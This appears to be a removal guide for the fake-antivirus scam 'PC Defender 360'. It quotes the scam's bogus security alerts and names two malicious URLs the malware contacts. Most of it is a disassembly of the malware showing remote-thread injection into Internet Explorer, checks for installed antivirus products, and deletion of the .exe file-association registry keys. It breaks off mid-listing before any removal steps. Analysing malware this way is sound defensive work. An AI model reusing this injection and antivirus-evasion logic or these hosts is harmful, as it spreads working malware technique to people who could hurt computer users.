How to Remove PC Defender 360? (Removal Guide)

Have unexpected program PC Defender 360 installed on your PC? Experience constantly pop-up message from PC Defender 360? Tried to uninstall the unexpectedly program by failed? This post will introduce you how to remove PC Defender 360 virus in detail. Please read more.

About PC Defender 360:

 

PC Defender 360 is a virus infection belongs to the Rogue.PCDefPlus family. It is a scam which may infect your computer that is not well protected and pretends to be a legitimate security program and alert you fake message that viruses, spywares and Trojans detected on your PC, and then pop-up a new window informing you that you need to pay money to register the software or pay money to remove these non-existent threats from your computer and protect your PC from malware infection.

 

Screenshot of PC Defender 360 fake program:

PC Defender 360 virus

 

Fake warning message alerted by PC Defender 360 you may see:

Security Alert
Vulnerabilities Found
Background scan for security breaches has been finished. Serious problems have been detected. Safeguard your system against exploits, malware and viruses right now by activating Proactive Defence.
Upgrade to full version of PC Defender 360 software package now!
Clean your system and ward off new attacks against your system integrity and sensitive data.
FREE daily updates and online protection from web-based intrusions are already in the bundle.

Security Alert
Unknown program is scanning your system registry right now! Identity theft detected!

Details
Attack from 142.97.249.230
Port 1390
Attack port 978
Threat Trojan.J.S.Fraud.ba

fake message alerted by PC Defender 360

 

PC Defender 360 Firewall Alert

An application taskmgr.exe is infected with not-a-virus:AdWare.Win32.Sushi.a. Private data can be stolen by third parties, including credit card details and passwords.

Name: taskmgr.exe
Version: 6.1.7600.16385 (win7-rtm.090713-1255)
Company: Microsoft Corporation
Location: C:\Windows\system32\taskmgr.exe

Windows recommends activating PC Defender 360.

Click Activate to register your copy of PC Defender 360 and perform threat removal on your system.

fake PC Defender 360 firewall alert

 

Behavior and damage of PC Defender 360: 

 

PC Defender 360 is very annoying and damaging that once get settled on your computer; it infects your Internet Explorer and visits malicious website, http://interfacemakes.biz/api/test, and http://coordinizespart.biz/api/test.

 

009D11F1    55                  push ebp
009D11F2    8BEC                mov ebp,esp
009D11F4    B8 64100000         mov eax,0x1064
009D11F9    E8 C2CF0000         call 009DE1C0
009D11FE    53                  push ebx
009D11FF    56                  push esi
009D1200    57                  push edi
009D1201    33F6                xor esi,esi
009D1203    6A 10               push 0x10
009D1205    8D45 E8             lea eax,dword ptr ss:[ebp-0x18]
009D1208    56                  push esi
009D1209    50                  push eax
009D120A    8975 FC             mov dword ptr ss:[ebp-0x4],esi
009D120D    E8 FEC30000         call 009DD610
009D1212    6A 44               push 0x44
009D1214    5F                  pop edi
009D1215    57                  push edi
009D1216    8D45 A0             lea eax,dword ptr ss:[ebp-0x60]
009D1219    56                  push esi
009D121A    50                  push eax
009D121B    E8 F0C30000         call 009DD610
009D1220    897D A0             mov dword ptr ss:[ebp-0x60],edi
009D1223    33C0                xor eax,eax
009D1225    BF 00080000         mov edi,0x800
009D122A    57                  push edi
009D122B    66:8945 D0          mov word ptr ss:[ebp-0x30],ax
009D122F    33DB                xor ebx,ebx
009D1231    8D85 A0F7FFFF       lea eax,dword ptr ss:[ebp-0x860]
009D1237    56                  push esi
009D1238    43                  inc ebx
009D1239    50                  push eax
009D123A    895D CC             mov dword ptr ss:[ebp-0x34],ebx
009D123D    E8 CEC30000         call 009DD610
009D1242    57                  push edi
009D1243    8D85 A0EFFFFF       lea eax,dword ptr ss:[ebp-0x1060]
009D1249    56                  push esi
009D124A    50                  push eax
009D124B    E8 C0C30000         call 009DD610
009D1250    83C4 30             add esp,0x30
009D1253    8D45 F8             lea eax,dword ptr ss:[ebp-0x8]
009D1256    50                  push eax
009D1257    8D85 A0F7FFFF       lea eax,dword ptr ss:[ebp-0x860]
009D125D    50                  push eax
009D125E    68 68F19D00         push 0x9DF168                            ; open
009D1263    68 74F19D00         push 0x9DF174                            ; http
009D1268    6A 02               push 0x2
009D126A    56                  push esi
009D126B    C745 F8 00040000    mov dword ptr ss:[ebp-0x8],0x400
009D1272    FF15 FCF09D00       call dword ptr ds:[0x9DF0FC]             ; shlwapi.AssocQueryStringW
009D1278    8D8D A0F7FFFF       lea ecx,dword ptr ss:[ebp-0x860]
009D127E    E8 5DC40000         call 009DD6E0
009D1283    85C0                test eax,eax
009D1285    74 43               je short 009D12CA
009D1287    E8 24C50000         call 009DD7B0
009D128C    3BC6                cmp eax,esi
009D128E    74 13               je short 009D12A3
009D1290    8BF8                mov edi,eax
009D1292    8BC1                mov eax,ecx
009D1294    2BF8                sub edi,eax
009D1296    D1FF                sar edi,1
009D1298    8D95 A0EFFFFF       lea edx,dword ptr ss:[ebp-0x1060]
009D129E    E8 0DC40000         call 009DD6B0
009D12A3    8D45 E8             lea eax,dword ptr ss:[ebp-0x18]
009D12A6    50                  push eax
009D12A7    8D45 A0             lea eax,dword ptr ss:[ebp-0x60]
009D12AA    50                  push eax
009D12AB    8D85 A0EFFFFF       lea eax,dword ptr ss:[ebp-0x1060]
009D12B1    50                  push eax
009D12B2    56                  push esi
009D12B3    6A 04               push 0x4
009D12B5    53                  push ebx
009D12B6    56                  push esi
009D12B7    56                  push esi
009D12B8    8D85 A0F7FFFF       lea eax,dword ptr ss:[ebp-0x860]
009D12BE    50                  push eax
009D12BF    56                  push esi
009D12C0    FF15 C8F09D00       call dword ptr ds:[0x9DF0C8]             ; kernel32.CreateProcessW
009D12C6    85C0                test eax,eax
009D12C8    75 65               jnz short 009D132F
009D12CA    53                  push ebx
009D12CB    6A 26               push 0x26
009D12CD    8D85 A0EFFFFF       lea eax,dword ptr ss:[ebp-0x1060]
009D12D3    50                  push eax
009D12D4    56                  push esi
009D12D5    FF15 F0F09D00       call dword ptr ds:[0x9DF0F0]             ; shell32.SHGetSpecialFolderPathW
009D12DB    B9 80F19D00         mov ecx,0x9DF180                         ; \Internet Explorer
009D12E0    8D85 A0EFFFFF       lea eax,dword ptr ss:[ebp-0x1060]
009D12E6    E8 05C40000         call 009DD6F0
009D12EB    8BC8                mov ecx,eax
009D12ED    8D95 A0F7FFFF       lea edx,dword ptr ss:[ebp-0x860]
009D12F3    E8 88C30000         call 009DD680
009D12F8    B9 A8F19D00         mov ecx,0x9DF1A8                         ; \iexplore.exe
009D12FD    8D85 A0F7FFFF       lea eax,dword ptr ss:[ebp-0x860]
009D1303    E8 E8C30000         call 009DD6F0
009D1308    8D45 E8             lea eax,dword ptr ss:[ebp-0x18]
009D130B    50                  push eax
009D130C    8D45 A0             lea eax,dword ptr ss:[ebp-0x60]
009D130F    50                  push eax
009D1310    8D85 A0EFFFFF       lea eax,dword ptr ss:[ebp-0x1060]
009D1316    50                  push eax
009D1317    56                  push esi
009D1318    6A 04               push 0x4
009D131A    53                  push ebx
009D131B    56                  push esi
009D131C    56                  push esi
009D131D    8D85 A0F7FFFF       lea eax,dword ptr ss:[ebp-0x860]
009D1323    50                  push eax
009D1324    56                  push esi
009D1325    FF15 C8F09D00       call dword ptr ds:[0x9DF0C8]             ; kernel32.CreateProcessW
009D132B    85C0                test eax,eax
009D132D    74 1E               je short 009D134D
009D132F    FF75 EC             push dword ptr ss:[ebp-0x14]
009D1332    FF15 C0F09D00       call dword ptr ds:[0x9DF0C0]             ; kernel32.CloseHandle
009D1338    8B45 E8             mov eax,dword ptr ss:[ebp-0x18]
009D133B    8945 FC             mov dword ptr ss:[ebp-0x4],eax
009D133E    3BC6                cmp eax,esi
009D1340    74 0B               je short 009D134D
009D1342    68 E8030000         push 0x3E8
009D1347    FF15 80F09D00       call dword ptr ds:[0x9DF080]             ; kernel32.Sleep
009D134D    8B45 FC             mov eax,dword ptr ss:[ebp-0x4]
009D1350    5F                  pop edi
009D1351    5E                  pop esi
009D1352    5B                  pop ebx
009D1353    C9                  leave
009D1354    C3                  retn
009D1355    56                  push esi
009D1356    33C0                xor eax,eax
009D1358    50                  push eax
009D1359    50                  push eax
009D135A    50                  push eax
009D135B    FF35 20F09D00       push dword ptr ds:[0x9DF020]             ; kernel32.ExitProcess
009D1361    50                  push eax
009D1362    50                  push eax
009D1363    FF7424 20           push dword ptr ss:[esp+0x20]
009D1367    FF15 1CF09D00       call dword ptr ds:[0x9DF01C]             ; kernel32.CreateRemoteThread
009D136D    8B35 C0F09D00       mov esi,dword ptr ds:[0x9DF0C0]          ; kernel32.CloseHandle
009D1373    50                  push eax
009D1374    FFD6                call esi
009D1376    FF7424 08           push dword ptr ss:[esp+0x8]
009D137A    FFD6                call esi
009D137C    5E                  pop esi
009D137D    C3                  retn
009D137E    55                  push ebp
009D137F    8BEC                mov ebp,esp
009D1381    81EC 54050000       sub esp,0x554
009D1387    53                  push ebx
009D1388    33DB                xor ebx,ebx
009D138A    B8 EC119D00         mov eax,0x9D11EC
009D138F    56                  push esi
009D1390    57                  push edi
009D1391    895D F8             mov dword ptr ss:[ebp-0x8],ebx
009D1394    3D 00109D00         cmp eax,0x9D1000
009D1399    0F86 31020000       jbe 009D15D0
009D139F    68 38050000         push 0x538
009D13A4    8D85 B0FAFFFF       lea eax,dword ptr ss:[ebp-0x550]
009D13AA    53                  push ebx
009D13AB    50                  push eax
009D13AC    E8 5FC20000         call 009DD610
009D13B1    A1 24F09D00         mov eax,dword ptr ds:[0x9DF024]
009D13B6    8985 B0FAFFFF       mov dword ptr ss:[ebp-0x550],eax
009D13BC    A1 28F09D00         mov eax,dword ptr ds:[0x9DF028]
009D13C1    8985 B4FAFFFF       mov dword ptr ss:[ebp-0x54C],eax
009D13C7    A1 2CF09D00         mov eax,dword ptr ds:[0x9DF02C]
009D13CC    8985 B8FAFFFF       mov dword ptr ss:[ebp-0x548],eax
009D13D2    A1 30F09D00         mov eax,dword ptr ds:[0x9DF030]
009D13D7    8985 BCFAFFFF       mov dword ptr ss:[ebp-0x544],eax
009D13DD    A1 34F09D00         mov eax,dword ptr ds:[0x9DF034]
009D13E2    8985 C0FAFFFF       mov dword ptr ss:[ebp-0x540],eax
009D13E8    8D85 C4FAFFFF       lea eax,dword ptr ss:[ebp-0x53C]
009D13EE    BA C4F19D00         mov edx,0x9DF1C4                         ; InternetOpenW
009D13F3    8BF0                mov esi,eax
009D13F5    83C4 0C             add esp,0xC
009D13F8    B1 49               mov cl,0x49
009D13FA    2BD6                sub edx,esi
009D13FC    8808                mov byte ptr ds:[eax],cl
009D13FE    40                  inc eax
009D13FF    8A0C02              mov cl,byte ptr ds:[edx+eax]
009D1402    3ACB                cmp cl,bl
009D1404  ^ 75 F6               jnz short 009D13FC
009D1406    8818                mov byte ptr ds:[eax],bl
009D1408    8D85 DCFAFFFF       lea eax,dword ptr ss:[ebp-0x524]
009D140E    BA D4F19D00         mov edx,0x9DF1D4                         ; InternetOpenUrlW
009D1413    8BF0                mov esi,eax
009D1415    B1 49               mov cl,0x49
009D1417    2BD6                sub edx,esi
009D1419    8808                mov byte ptr ds:[eax],cl
009D141B    40                  inc eax
009D141C    8A0C02              mov cl,byte ptr ds:[edx+eax]
009D141F    3ACB                cmp cl,bl
009D1421  ^ 75 F6               jnz short 009D1419
009D1423    8818                mov byte ptr ds:[eax],bl
009D1425    8D85 F4FAFFFF       lea eax,dword ptr ss:[ebp-0x50C]
009D142B    BA E8F19D00         mov edx,0x9DF1E8                         ; InternetReadFile
009D1430    8BF0                mov esi,eax
009D1432    B1 49               mov cl,0x49
009D1434    2BD6                sub edx,esi
009D1436    8808                mov byte ptr ds:[eax],cl
009D1438    40                  inc eax
009D1439    8A0C02              mov cl,byte ptr ds:[edx+eax]
009D143C    3ACB                cmp cl,bl
009D143E  ^ 75 F6               jnz short 009D1436
009D1440    8818                mov byte ptr ds:[eax],bl
009D1442    8D85 0CFBFFFF       lea eax,dword ptr ss:[ebp-0x4F4]
009D1448    BA FCF19D00         mov edx,0x9DF1FC                         ; InternetCloseHandle
009D144D    8BF0                mov esi,eax
009D144F    B1 49               mov cl,0x49
009D1451    2BD6                sub edx,esi
009D1453    8808                mov byte ptr ds:[eax],cl
009D1455    40                  inc eax
009D1456    8A0C02              mov cl,byte ptr ds:[edx+eax]
009D1459    3ACB                cmp cl,bl
009D145B  ^ 75 F6               jnz short 009D1453
009D145D    8818                mov byte ptr ds:[eax],bl
009D145F    8D85 24FBFFFF       lea eax,dword ptr ss:[ebp-0x4DC]
009D1465    BA 10F29D00         mov edx,0x9DF210                         ; HttpQueryInfoW
009D146A    8BF0                mov esi,eax
009D146C    B1 48               mov cl,0x48
009D146E    2BD6                sub edx,esi
009D1470    8808                mov byte ptr ds:[eax],cl
009D1472    40                  inc eax
009D1473    8A0C02              mov cl,byte ptr ds:[edx+eax]
009D1476    3ACB                cmp cl,bl
009D1478  ^ 75 F6               jnz short 009D1470
009D147A    B9 20F29D00         mov ecx,0x9DF220                         ; wininet.dll
009D147F    8D95 3CFBFFFF       lea edx,dword ptr ss:[ebp-0x4C4]
009D1485    8818                mov byte ptr ds:[eax],bl
009D1487    E8 F4C10000         call 009DD680
009D148C    B9 38F29D00         mov ecx,0x9DF238                         ; Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)
009D1491    8D95 5CFBFFFF       lea edx,dword ptr ss:[ebp-0x4A4]
009D1497    E8 E4C10000         call 009DD680
009D149C    8B4D 0C             mov ecx,dword ptr ss:[ebp+0xC]
009D149F    BF FF010000         mov edi,0x1FF
009D14A4    8D95 DCFBFFFF       lea edx,dword ptr ss:[ebp-0x424]
009D14AA    E8 01C20000         call 009DD6B0
009D14AF    395D 10             cmp dword ptr ss:[ebp+0x10],ebx
009D14B2    74 0C               je short 009D14C0
009D14B4    C745 DC 01000000    mov dword ptr ss:[ebp-0x24],0x1
009D14BB    395D 14             cmp dword ptr ss:[ebp+0x14],ebx
009D14BE    75 03               jnz short 009D14C3
009D14C0    895D DC             mov dword ptr ss:[ebp-0x24],ebx
009D14C3    8B3D 38F09D00       mov edi,dword ptr ds:[0x9DF038]          ; kernel32.VirtualAllocEx
009D14C9    6A 04               push 0x4
009D14CB    BE 00100000         mov esi,0x1000
009D14D0    56                  push esi
009D14D1    68 38050000         push 0x538
009D14D6    53                  push ebx
009D14D7    FF75 08             push dword ptr ss:[ebp+0x8]
009D14DA    FFD7                call edi
009D14DC    8945 F4             mov dword ptr ss:[ebp-0xC],eax
009D14DF    3BC3                cmp eax,ebx
009D14E1    0F84 E9000000       je 009D15D0
009D14E7    6A 20               push 0x20
009D14E9    56                  push esi
009D14EA    C745 FC EC119D00    mov dword ptr ss:[ebp-0x4],0x9D11EC
009D14F1    816D FC 00109D00    sub dword ptr ss:[ebp-0x4],0x9D1000
009D14F8    FF75 FC             push dword ptr ss:[ebp-0x4]
009D14FB    53                  push ebx
009D14FC    FF75 08             push dword ptr ss:[ebp+0x8]
009D14FF    FFD7                call edi
009D1501    8945 EC             mov dword ptr ss:[ebp-0x14],eax
009D1504    3BC3                cmp eax,ebx
009D1506    0F84 C4000000       je 009D15D0
009D150C    8B3D 3CF09D00       mov edi,dword ptr ds:[0x9DF03C]          ; kernel32.WriteProcessMemory
009D1512    53                  push ebx
009D1513    FF75 FC             push dword ptr ss:[ebp-0x4]
009D1516    68 00109D00         push 0x9D1000
009D151B    50                  push eax
009D151C    FF75 08             push dword ptr ss:[ebp+0x8]
009D151F    FFD7                call edi
009D1521    85C0                test eax,eax
009D1523    0F84 A7000000       je 009D15D0
009D1529    53                  push ebx
009D152A    BE 38050000         mov esi,0x538
009D152F    56                  push esi
009D1530    8D85 B0FAFFFF       lea eax,dword ptr ss:[ebp-0x550]
009D1536    50                  push eax
009D1537    FF75 F4             push dword ptr ss:[ebp-0xC]
009D153A    FF75 08             push dword ptr ss:[ebp+0x8]
009D153D    FFD7                call edi
009D153F    85C0                test eax,eax
009D1541    0F84 89000000       je 009D15D0
009D1547    53                  push ebx
009D1548    53                  push ebx
009D1549    FF75 F4             push dword ptr ss:[ebp-0xC]
009D154C    FF75 EC             push dword ptr ss:[ebp-0x14]
009D154F    53                  push ebx
009D1550    53                  push ebx
009D1551    FF75 08             push dword ptr ss:[ebp+0x8]
009D1554    FF15 1CF09D00       call dword ptr ds:[0x9DF01C]             ; kernel32.CreateRemoteThread
009D155A    8BF8                mov edi,eax
009D155C    3BFB                cmp edi,ebx
009D155E    74 70               je short 009D15D0
009D1560    6A FF               push -0x1
009D1562    57                  push edi
009D1563    FF15 40F09D00       call dword ptr ds:[0x9DF040]             ; kernel32.WaitForSingleObject
009D1569    8D45 F0             lea eax,dword ptr ss:[ebp-0x10]
009D156C    50                  push eax
009D156D    57                  push edi
009D156E    FF15 44F09D00       call dword ptr ds:[0x9DF044]             ; kernel32.GetExitCodeThread
009D1574    57                  push edi
009D1575    FF15 C0F09D00       call dword ptr ds:[0x9DF0C0]             ; kernel32.CloseHandle
009D157B    8B45 F0             mov eax,dword ptr ss:[ebp-0x10]
009D157E    83F8 FF             cmp eax,-0x1
009D1581    74 4D               je short 009D15D0
009D1583    C745 F8 01000000    mov dword ptr ss:[ebp-0x8],0x1
009D158A    395D DC             cmp dword ptr ss:[ebp-0x24],ebx
009D158D    74 41               je short 009D15D0
009D158F    8B4D 14             mov ecx,dword ptr ss:[ebp+0x14]
009D1592    8901                mov dword ptr ds:[ecx],eax
009D1594    40                  inc eax
009D1595    E8 36C00000         call 009DD5D0
009D159A    8B4D 10             mov ecx,dword ptr ss:[ebp+0x10]
009D159D    8901                mov dword ptr ds:[ecx],eax
009D159F    3BC3                cmp eax,ebx
009D15A1    74 2A               je short 009D15CD
009D15A3    8B3D 48F09D00       mov edi,dword ptr ds:[0x9DF048]          ; kernel32.ReadProcessMemory
009D15A9    53                  push ebx
009D15AA    56                  push esi
009D15AB    8D85 B0FAFFFF       lea eax,dword ptr ss:[ebp-0x550]
009D15B1    50                  push eax
009D15B2    FF75 F4             push dword ptr ss:[ebp-0xC]
009D15B5    FF75 08             push dword ptr ss:[ebp+0x8]
009D15B8    FFD7                call edi
009D15BA    8B45 10             mov eax,dword ptr ss:[ebp+0x10]
009D15BD    53                  push ebx
009D15BE    FF75 F0             push dword ptr ss:[ebp-0x10]
009D15C1    FF30                push dword ptr ds:[eax]
009D15C3    FF75 E0             push dword ptr ss:[ebp-0x20]
009D15C6    FF75 08             push dword ptr ss:[ebp+0x8]
009D15C9    FFD7                call edi
009D15CB    EB 03               jmp short 009D15D0
009D15CD    895D F8             mov dword ptr ss:[ebp-0x8],ebx
009D15D0    8B45 F8             mov eax,dword ptr ss:[ebp-0x8]
009D15D3    5F                  pop edi
009D15D4    5E                  pop esi
009D15D5    5B                  pop ebx
009D15D6    C9                  leave
009D15D7    C3                  retn

 

After that, in order to protect itself from being removed, PC Defender 360 starts to check if antivirus program like Kaspersky、Avira、NOD32、MSE installed on the compromised computer, if find any, PC Defender 360 will disable the antivirus program, if you wish to use it, PC Defender 360 will terminate it and then display a bogus alert that states the program is infected. See following behavior:

 

009D15D8    55                  push ebp
009D15D9    8BEC                mov ebp,esp
009D15DB    83EC 0C             sub esp,0xC
009D15DE    834D FC FF          or dword ptr ss:[ebp-0x4],-0x1
009D15E2    53                  push ebx
009D15E3    56                  push esi
009D15E4    8B35 00F09D00       mov esi,dword ptr ds:[0x9DF000]          ; advapi32.RegOpenKeyExW
009D15EA    57                  push edi
009D15EB    8D45 F4             lea eax,dword ptr ss:[ebp-0xC]
009D15EE    50                  push eax
009D15EF    BF 19000200         mov edi,0x20019
009D15F4    57                  push edi
009D15F5    33DB                xor ebx,ebx
009D15F7    53                  push ebx
009D15F8    68 B8F29D00         push 0x9DF2B8                            ; SOFTWARE
009D15FD    68 02000080         push 0x80000002
009D1602    FFD6                call esi
009D1604    85C0                test eax,eax
009D1606    0F85 88000000       jnz 009D1694
009D160C    8D45 F8             lea eax,dword ptr ss:[ebp-0x8]
009D160F    50                  push eax
009D1610    57                  push edi
009D1611    53                  push ebx
009D1612    68 CCF29D00         push 0x9DF2CC                            ; KasperskyLab
009D1617    FF75 F4             push dword ptr ss:[ebp-0xC]
009D161A    895D FC             mov dword ptr ss:[ebp-0x4],ebx
009D161D    FFD6                call esi
009D161F    8B1D 04F09D00       mov ebx,dword ptr ds:[0x9DF004]          ; advapi32.RegCloseKey
009D1625    85C0                test eax,eax
009D1627    75 0C               jnz short 009D1635
009D1629    FF75 F8             push dword ptr ss:[ebp-0x8]
009D162C    C745 FC 01000000    mov dword ptr ss:[ebp-0x4],0x1
009D1633    FFD3                call ebx
009D1635    8D45 F8             lea eax,dword ptr ss:[ebp-0x8]
009D1638    50                  push eax
009D1639    57                  push edi
009D163A    6A 00               push 0x0
009D163C    68 E8F29D00         push 0x9DF2E8                            ; Avira
009D1641    FF75 F4             push dword ptr ss:[ebp-0xC]
009D1644    FFD6                call esi
009D1646    85C0                test eax,eax
009D1648    75 09               jnz short 009D1653
009D164A    FF75 F8             push dword ptr ss:[ebp-0x8]
009D164D    834D FC 02          or dword ptr ss:[ebp-0x4],0x2
009D1651    FFD3                call ebx
009D1653    8D45 F8             lea eax,dword ptr ss:[ebp-0x8]
009D1656    50                  push eax
009D1657    57                  push edi
009D1658    6A 00               push 0x0
009D165A    68 F4F29D00         push 0x9DF2F4                            ; ESET
009D165F    FF75 F4             push dword ptr ss:[ebp-0xC]
009D1662    FFD6                call esi
009D1664    85C0                test eax,eax
009D1666    75 09               jnz short 009D1671
009D1668    FF75 F8             push dword ptr ss:[ebp-0x8]
009D166B    834D FC 04          or dword ptr ss:[ebp-0x4],0x4
009D166F    FFD3                call ebx
009D1671    8D45 F8             lea eax,dword ptr ss:[ebp-0x8]
009D1674    50                  push eax
009D1675    57                  push edi
009D1676    6A 00               push 0x0
009D1678    68 00F39D00         push 0x9DF300                            ; Microsoft\Microsoft Antimalware
009D167D    FF75 F4             push dword ptr ss:[ebp-0xC]
009D1680    FFD6                call esi
009D1682    85C0                test eax,eax
009D1684    75 09               jnz short 009D168F
009D1686    FF75 F8             push dword ptr ss:[ebp-0x8]
009D1689    834D FC 08          or dword ptr ss:[ebp-0x4],0x8
009D168D    FFD3                call ebx
009D168F    FF75 F4             push dword ptr ss:[ebp-0xC]
009D1692    FFD3                call ebx
009D1694    8B45 FC             mov eax,dword ptr ss:[ebp-0x4]
009D1697    5F                  pop edi
009D1698    5E                  pop esi
009D1699    5B                  pop ebx
009D169A    C9                  leave
009D169B    C3                  retn
009D169C    55                  push ebp
009D169D    8BEC                mov ebp,esp
009D169F    81EC 08010000       sub esp,0x108
009D16A5    53                  push ebx
009D16A6    57                  push edi
009D16A7    8D7C08 FE           lea edi,dword ptr ds:[eax+ecx-0x2]
009D16AB    0FB707              movzx eax,word ptr ds:[edi]
009D16AE    69C0 60EA0000       imul eax,eax,0xEA60
009D16B4    8946 30             mov dword ptr ds:[esi+0x30],eax
009D16B7    4F                  dec edi
009D16B8    4F                  dec edi
009D16B9    0FB71F              movzx ebx,word ptr ds:[edi]
009D16BC    8BC3                mov eax,ebx
009D16BE    C1E0 08             shl eax,0x8
009D16C1    8945 FC             mov dword ptr ss:[ebp-0x4],eax
009D16C4    E8 07BF0000         call 009DD5D0
009D16C9    83A6 34020000 00    and dword ptr ds:[esi+0x234],0x0
009D16D0    8986 38020000       mov dword ptr ds:[esi+0x238],eax
009D16D6    8B45 FC             mov eax,dword ptr ss:[ebp-0x4]
009D16D9    E8 F2BE0000         call 009DD5D0
009D16DE    83A6 3C020000 00    and dword ptr ds:[esi+0x23C],0x0
009D16E5    83BE 38020000 00    cmp dword ptr ds:[esi+0x238],0x0
009D16EC    8986 40020000       mov dword ptr ds:[esi+0x240],eax
009D16F2    0F84 97000000       je 009D178F
009D16F8    85C0                test eax,eax
009D16FA    0F84 8F000000       je 009D178F
009D1700    4F                  dec edi
009D1701    85DB                test ebx,ebx
009D1703    7E 78               jle short 009D177D
009D1705    68 00010000         push 0x100
009D170A    8D85 F8FEFFFF       lea eax,dword ptr ss:[ebp-0x108]
009D1710    6A 00               push 0x0
009D1712    50                  push eax
009D1713    E8 F8BE0000         call 009DD610
009D1718    0FB617              movzx edx,byte ptr ds:[edi]
009D171B    2BFA                sub edi,edx
009D171D    83C4 0C             add esp,0xC
009D1720    8BCF                mov ecx,edi
009D1722    8D85 F8FEFFFF       lea eax,dword ptr ss:[ebp-0x108]
009D1728    E8 13BF0000         call 009DD640
009D172D    4F                  dec edi
009D172E    80BD F8FEFFFF 40    cmp byte ptr ss:[ebp-0x108],0x40
009D1735    75 20               jnz short 009D1757
009D1737    8B86 3C020000       mov eax,dword ptr ds:[esi+0x23C]
009D173D    8BC8                mov ecx,eax
009D173F    C1E1 08             shl ecx,0x8
009D1742    038E 40020000       add ecx,dword ptr ds:[esi+0x240]
009D1748    40                  inc eax
009D1749    8986 3C020000       mov dword ptr ds:[esi+0x23C],eax
009D174F    8D95 F9FEFFFF       lea edx,dword ptr ss:[ebp-0x107]
009D1755    EB 1E               jmp short 009D1775
009D1757    8B86 34020000       mov eax,dword ptr ds:[esi+0x234]
009D175D    8BC8                mov ecx,eax
009D175F    C1E1 08             shl ecx,0x8
009D1762    038E 38020000       add ecx,dword ptr ds:[esi+0x238]
009D1768    40                  inc eax
009D1769    8986 34020000       mov dword ptr ds:[esi+0x234],eax
009D176F    8D95 F8FEFFFF       lea edx,dword ptr ss:[ebp-0x108]
009D1775    E8 E6BE0000         call 009DD660
009D177A    4B                  dec ebx
009D177B  ^ 75 88               jnz short 009D1705
009D177D    83EF 03             sub edi,0x3
009D1780    66:8B07             mov ax,word ptr ds:[edi]
009D1783    66:8946 2A          mov word ptr ds:[esi+0x2A],ax
009D1787    66:8B47 02          mov ax,word ptr ds:[edi+0x2]
009D178B    66:8946 2C          mov word ptr ds:[esi+0x2C],ax
009D178F    5F                  pop edi
009D1790    5B                  pop ebx
009D1791    C9                  leave
009D1792    C3                  retn

 

Next, PC Defender 360 deletes .exe extension file association from the registry that will result in program installed on your computer Not Operational.

009DE11B    55                  push ebp
009DE11C    8BEC                mov ebp,esp
009DE11E    83EC 1C             sub esp,0x1C
009DE121    56                  push esi
009DE122    C745 E4 A8F59D00    mov dword ptr ss:[ebp-0x1C],0x9DF5A8     ; Software\Classes\.exe\shell\runas\command
009DE129    C745 E8 00F69D00    mov dword ptr ss:[ebp-0x18],0x9DF600     ; Software\Classes\.exe\shell\runas
009DE130    C745 EC 48F69D00    mov dword ptr ss:[ebp-0x14],0x9DF648     ; Software\Classes\.exe\shell\open\command
009DE137    C745 F0 A0F69D00    mov dword ptr ss:[ebp-0x10],0x9DF6A0     ; Software\Classes\.exe\shell\open
009DE13E    C745 F4 E4F69D00    mov dword ptr ss:[ebp-0xC],0x9DF6E4      ; Software\Classes\.exe\shell
009DE145    C745 F8 20F79D00    mov dword ptr ss:[ebp-0x8],0x9DF720      ; Software\Classes\.exe\DefaultIcon
009DE14C    C745 FC 64F79D00    mov dword ptr ss:[ebp-0x4],0x9DF764      ; Software\Classes\.exe
009DE153    33F6                xor esi,esi
009DE155    FF74B5 E4           push dword ptr ss:[ebp+esi*4-0x1C]
009DE159    68 01000080         push 0x80000001
009DE15E    FF15 10F09D00       call dword ptr ds:[0x9DF010]             ; advapi32.RegDeleteKeyW
009DE164    46                  inc esi
009DE165    83FE 07             cmp esi,0x7
009DE168  ^ 72 EB               jb short 009DE155
009DE16A    5E                  pop esi
009DE16B    C9                  leave
009DE16C    C3                  retn

 

Then, PC Defender 360 will get %CommonAppdata% directory and create ifdstore file; get %CommonDesktop directory and create PC Defender 360.lnk file.

009DDD4C    55                  push ebp
009DDD4D    8BEC                mov ebp,esp
009DDD4F    B8 00200000         mov eax,0x2000
009DDD54    E8 67040000         call 009DE1C0
009DDD59    8B4D 08             mov ecx,dword ptr ss:[ebp+0x8]
009DDD5C    56                  push esi
009DDD5D    33D2                xor edx,edx
009DDD5F    E8 7CF9FFFF         call 009DD6E0
009DDD64    8BF0                mov esi,eax
009DDD66    81FE FF0F0000       cmp esi,0xFFF
009DDD6C    0F83 82000000       jnb 009DDDF4
009DDD72    68 00200000         push 0x2000
009DDD77    52                  push edx
009DDD78    8D85 00E0FFFF       lea eax,dword ptr ss:[ebp-0x2000]
009DDD7E    50                  push eax
009DDD7F    E8 8CF8FFFF         call 009DD610
009DDD84    8B4D 08             mov ecx,dword ptr ss:[ebp+0x8]
009DDD87    83C4 0C             add esp,0xC
009DDD8A    8D95 00E0FFFF       lea edx,dword ptr ss:[ebp-0x2000]
009DDD90    E8 EBF8FFFF         call 009DD680
009DDD95    8D8475 00E0FFFF     lea eax,dword ptr ss:[ebp+esi*2-0x2000]
009DDD9C    66:8338 5C          cmp word ptr ds:[eax],0x5C
009DDDA0    74 06               je short 009DDDA8
009DDDA2    6A 5C               push 0x5C
009DDDA4    59                  pop ecx
009DDDA5    66:8908             mov word ptr ds:[eax],cx
009DDDA8    8D85 00E0FFFF       lea eax,dword ptr ss:[ebp-0x2000]
009DDDAE    EB 28               jmp short 009DDDD8
009DDDB0    33C0                xor eax,eax
009DDDB2    8D8D 00E0FFFF       lea ecx,dword ptr ss:[ebp-0x2000]
009DDDB8    66:8906             mov word ptr ds:[esi],ax
009DDDBB    E8 20F9FFFF         call 009DD6E0
009DDDC0    85C0                test eax,eax
009DDDC2    74 0B               je short 009DDDCF
009DDDC4    6A 00               push 0x0
009DDDC6    8BC1                mov eax,ecx
009DDDC8    50                  push eax
009DDDC9    FF15 E0F09D00       call dword ptr ds:[0x9DF0E0]             ; kernel32.CreateDirectoryW
009DDDCF    6A 5C               push 0x5C
009DDDD1    58                  pop eax
009DDDD2    66:8906             mov word ptr ds:[esi],ax
009DDDD5    8D46 02             lea eax,dword ptr ds:[esi+0x2]
009DDDD8    E8 A3F9FFFF         call 009DD780
009DDDDD    8BF0                mov esi,eax
009DDDDF    85F6                test esi,esi
009DDDE1  ^ 75 CD               jnz short 009DDDB0
009DDDE3    FF75 08             push dword ptr ss:[ebp+0x8]
009DDDE6    FF15 E4F09D00       call dword ptr ds:[0x9DF0E4]             ; kernel32.GetFileAttributesW
009DDDEC    33D2                xor edx,edx
